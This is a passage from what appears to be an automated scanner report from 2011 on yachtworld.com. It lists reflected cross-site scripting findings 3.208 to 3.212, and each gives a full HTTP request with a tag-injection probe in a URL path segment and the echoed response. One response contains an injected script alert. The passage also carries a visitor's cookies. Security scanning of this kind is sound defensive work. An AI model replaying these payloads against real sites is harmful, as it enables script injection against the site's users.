s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:52:35 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a href="/boats/category/typea6e15"><script>alert(1)</script>83362fb7d64/260+Cruiser">
...[SNIP]...

3.208. http://www.yachtworld.com/boats/category/type/Cabo/1 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Cabo/1

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2272c"><a>415fc3111c2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /boats/category/type/Cabo2272c"><a>415fc3111c2/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:52:37 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a href="/boats/category/type/Cabo2272c"><a>415fc3111c2/A-1">
...[SNIP]...

3.209. http://www.yachtworld.com/boats/category/type/Cabo/1 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Cabo/1

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d10a"><a>b2fb296d293 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /boats/category/type/Cabo/15d10a"><a>b2fb296d293 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:52:44 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a class="navFirst" href="/boats/category/type/Cabo/15d10a"><a>b2fb296d293/1">
...[SNIP]...

3.210. http://www.yachtworld.com/boats/category/type/Cape+Dory/1 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Cape+Dory/1

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e710"><a>a7261d76f33 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /boats/category/type5e710"><a>a7261d76f33/Cape+Dory/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:52:39 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a href="/boats/category/type5e710"><a>a7261d76f33/Cape+Dory/25">
...[SNIP]...

3.211. http://www.yachtworld.com/boats/category/type/Cape+Dory/1 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Cape+Dory/1

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 354c6"><a>aa06a1464bd was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /boats/category/type/Cape+Dory354c6"><a>aa06a1464bd/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:52:48 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a href="/boats/category/type/Cape+Dory354c6"><a>aa06a1464bd/A-1">
...[SNIP]...

3.212. http://www.yachtworld.com/boats/category/type/Carver/1 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Carver/1

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca4fa"><a>2abff94b915 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /boats/category/typeca4fa"><a>2abff94b915/Carver/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; 